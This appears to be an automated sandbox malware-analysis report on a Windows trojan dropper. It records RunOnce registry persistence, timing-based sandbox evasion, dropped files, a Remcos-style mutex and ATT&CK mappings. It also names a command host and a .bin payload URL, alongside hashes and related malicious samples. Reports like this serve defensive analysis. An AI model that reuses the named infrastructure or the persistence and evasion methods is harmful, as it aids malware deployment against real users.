          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_73C61B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73C61B5F

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scrJump to dropped file
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scrJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scrJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scrJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriamJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriam\Fonerne237Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnkJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulskeJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulskeJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulskeJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulskeJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeAPI/Special instruction interceptor: Address: 56CB3E3
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeAPI/Special instruction interceptor: Address: 225B3E3
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRDTSC instruction interceptor: First address: 5687B37 second address: 5687B37 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, ax 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F760CDB1787h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeRDTSC instruction interceptor: First address: 2217B37 second address: 2217B37 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, ax 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F760C5229D7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeWindow / User API: threadDelayed 1779Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeWindow / User API: threadDelayed 8213Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040Thread sleep count: 1779 > 30Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040Thread sleep time: -5337000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040Thread sleep count: 8213 > 30Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040Thread sleep time: -24639000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405AFA
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_00402868 FindFirstFileW,8_2_00402868
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_0040672B FindFirstFileW,FindClose,8_2_0040672B
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 8_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,8_2_00405AFA
          Source: KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006AE8000.00000004.00000020.00020000.00000000.sdmp, KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeAPI call chain: ExitProcess graph end nodegraph_0-4541
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeAPI call chain: ExitProcess graph end nodegraph_0-4696
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_00406943 GlobalFree,LdrInitializeThunk,GlobalAlloc,GlobalFree,LdrInitializeThunk,GlobalAlloc,0_2_00406943
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_73C61B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73C61B5F
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeProcess created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"Jump to behavior
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: C:\Users\user\Desktop\KO0q4biYfC.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B0AIE8Jump to behavior
          Source: Yara matchFile source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          111
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          11
          Masquerading
          OS Credential Dumping31
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          11
          Process Injection
          1
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Clipboard Data
          1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          Security Account Manager1
          Application Window Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Remote Access Software
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          11
          Process Injection
          NTDS3
          File and Directory Discovery
          Distributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets23
          System Information Discovery
          SSHKeylogging2
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture113
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          KO0q4biYfC.exe42%ReversingLabsWin32.Trojan.Generic
          KO0q4biYfC.exe53%VirustotalBrowse
          KO0q4biYfC.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr42%ReversingLabsWin32.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          newkezfill.site0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/PLBVeySxbfKXMM176.bin0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          newkezfill.site
          87.120.84.23
          truetrue
            unknown
            healthselflesssupplies.co.za
            164.160.91.32
            truefalse
              unknown
              www.healthselflesssupplies.co.za
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                newkezfill.sitetrue
                • Avira URL Cloud: safe
                unknown
                https://www.healthselflesssupplies.co.za/PLBVeySxbfKXMM176.binfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorErrorKO0q4biYfC.exe, Plderer180.scr.8.drfalse
                  high
                  https://www.healthselflesssupplies.co.za/KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  164.160.91.32
                  healthselflesssupplies.co.zaSouth Africa
                  328037ElitehostZAfalse
                  87.120.84.23
                  newkezfill.siteBulgaria
                  51189SHARCOM-ASBGtrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1585953
                  Start date and time:2025-01-08 15:07:08 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 17s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:KO0q4biYfC.exe
                  renamed because original name is a hash value
                  Original Sample Name:03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@3/11@2/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 91%
                  • Number of executed functions: 56
                  • Number of non-executed functions: 71
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target KO0q4biYfC.exe, PID 6596 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  10:51:09API Interceptor4016311x Sleep call for process: KO0q4biYfC.exe modified
                  16:50:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr
                  16:50:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  164.160.91.32Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ElitehostZAQuote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 164.160.91.32
                        Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 164.160.91.32
                        https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                        • 164.160.91.32
                        https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.comGet hashmaliciousUnknownBrowse
                        • 164.160.91.37
                        https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6Get hashmaliciousUnknownBrowse
                        • 164.160.91.31
                        https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==Get hashmaliciousUnknownBrowse
                        • 164.160.91.31
                        http://www.fire.co.zaGet hashmaliciousUnknownBrowse
                        • 164.160.91.17
                        https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=Get hashmaliciousUnknownBrowse
                        • 164.160.91.23
                        https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                        • 164.160.91.23
                        Q_u_a_r_a_nt_i_n_e A_l_e_r_t giovanni.busco RD6KUA46 648950657.emlGet hashmaliciousHTMLPhisherBrowse
                        • 164.160.91.37
                        SHARCOM-ASBGcasseyofficefile.dot.rtfGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        Inquiries-Quote Products.docx.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        Inquiries-Quote Products.docx.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        xXdquUOrM1vD3An.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        7ar1l60013Sx8PT.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        d1wn7m0x0FWFbfs.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        xi4HNTgb7wewrDQ.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        zxdonmn.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        Bank Copy.docx.docGet hashmaliciousUnknownBrowse
                        • 87.120.84.39
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 164.160.91.32
                        e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                        • 164.160.91.32
                        e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                        • 164.160.91.32
                        chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                        • 164.160.91.32
                        xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                        • 164.160.91.32
                        leBwnyHIgx.exeGet hashmaliciousGhostRatBrowse
                        • 164.160.91.32
                        c2.htaGet hashmaliciousRemcosBrowse
                        • 164.160.91.32
                        c2.htaGet hashmaliciousRemcosBrowse
                        • 164.160.91.32
                        setup.msiGet hashmaliciousUnknownBrowse
                        • 164.160.91.32
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dllYoranis Setup.exeGet hashmaliciousUnknownBrowse
                          Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                            Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                              Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                  Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                        YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                          CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                            Process:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):48
                                            Entropy (8bit):4.829448698502606
                                            Encrypted:false
                                            SSDEEP:3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
                                            MD5:E7F60749537446D1C77072173B5415A3
                                            SHA1:B9CFEF43585C8B26A5DAA2FE581859759A183C67
                                            SHA-256:3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
                                            SHA-512:D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
                                            Malicious:false
                                            Reputation:low
                                            Preview:[ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..
                                            Process:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:dropped
                                            Size (bytes):518146
                                            Entropy (8bit):7.955449898327909
                                            Encrypted:false
                                            SSDEEP:12288:B7MTFoKqS6k0jRWhI/L366W5Fd3IYXCNoSZFDHBa7Pqh:B7MTFoZS6kURFL66seoS3Dha7ih
                                            MD5:DD935B0E91E2E551B21296D8FA186D11
                                            SHA1:9638372C80F866BDC1B73AF7971918E8BA7AB9E7
                                            SHA-256:03FE92BF84EFFB45DFB4C47DA5704F0B35C3CA3B562AC2F46C1DA51A8829EB5E
                                            SHA-512:FDF1FFBEB25F7E0B691C6F0127C297C804D1ECC71579FEF69E7D27429902988EE84B34CE2826C49B213F96B1A47D32868DDBCD23D4954D5D80535373FB40D109
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 42%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.......4............@..........................`............@.......................................... ..`1...........................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...X............~..............@....ndata...p...............................rsrc...`1... ...2..................@..@................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.719859767584478
                                            Encrypted:false
                                            SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                            MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                            SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                            SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                            SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                            • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                            • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                            • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                            • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                            • Filename: Awb 4586109146.bat.exe, Detection: malicious, Browse
                                            • Filename: PO 0309494059506060609696007.exe, Detection: malicious, Browse
                                            • Filename: YF3YnL4ksc.exe, Detection: malicious, Browse
                                            • Filename: YF3YnL4ksc.exe, Detection: malicious, Browse
                                            • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                            Reputation:high, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1330866
                                            Entropy (8bit):3.558848742520734
                                            Encrypted:false
                                            SSDEEP:12288:32D0KF877z7ZNcDeNsFeIkWi3pjcdCByKSq:mY77z1yUs39it6CB2q
                                            MD5:54C04146ACF828660D7C4DF9359353B5
                                            SHA1:1E5A11DF9AF39210301D92065A163EE866BF4E20
                                            SHA-256:3CB43D0A8EF5152CF8EC26F416E6374765D782D7CEB3D89D25A51BF0A4016EBC
                                            SHA-512:78EE69C1B24995C8A0369776F6CD5E83886D19FDC43CF8D6F1665876998A1CEEBD87FB04F3B7EA6F4CAF4DE1C7CCC0CD0B43C4D8658E3C20C48B3ADEE67BBB8C
                                            Malicious:false
                                            Reputation:low
                                            Preview:.#......,...................l............"......r#..........................................................t.x.............................................................................................................................................................................G...R...........}...j...........................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):27
                                            Entropy (8bit):4.134336113194451
                                            Encrypted:false
                                            SSDEEP:3:iGAeSMn:lAeZ
                                            MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                            SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                            SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                            SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:[Access]..Setting=Enabled..
                                            Process:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):858
                                            Entropy (8bit):3.3886083215736877
                                            Encrypted:false
                                            SSDEEP:12:8wl0o0m/3BV6XDPK827Mex9sl9fW+wR27Mvsl9fkXg1MJ5lL6CNbw4t2YZ/elFlz:8kJ/B8Krm9e+wk9fow2bIqy
                                            MD5:C7CBB76C0820BE9D0E42F9CCF5F1BE20
                                            SHA1:535C6D458330B55596280B3D9B7AFCA743198139
                                            SHA-256:AE235EFAC63977B67340A7BD1E8916059A0C301525A72E8F637456272EF7EB59
                                            SHA-512:3F86477FC11ED9578174809547899031489E8D09E16C888D519D6895D5B19EF96A2EF8B0BD75D15418FE30392767862F106834B4D72ECCF7FD03621C586D28EA
                                            Malicious:false
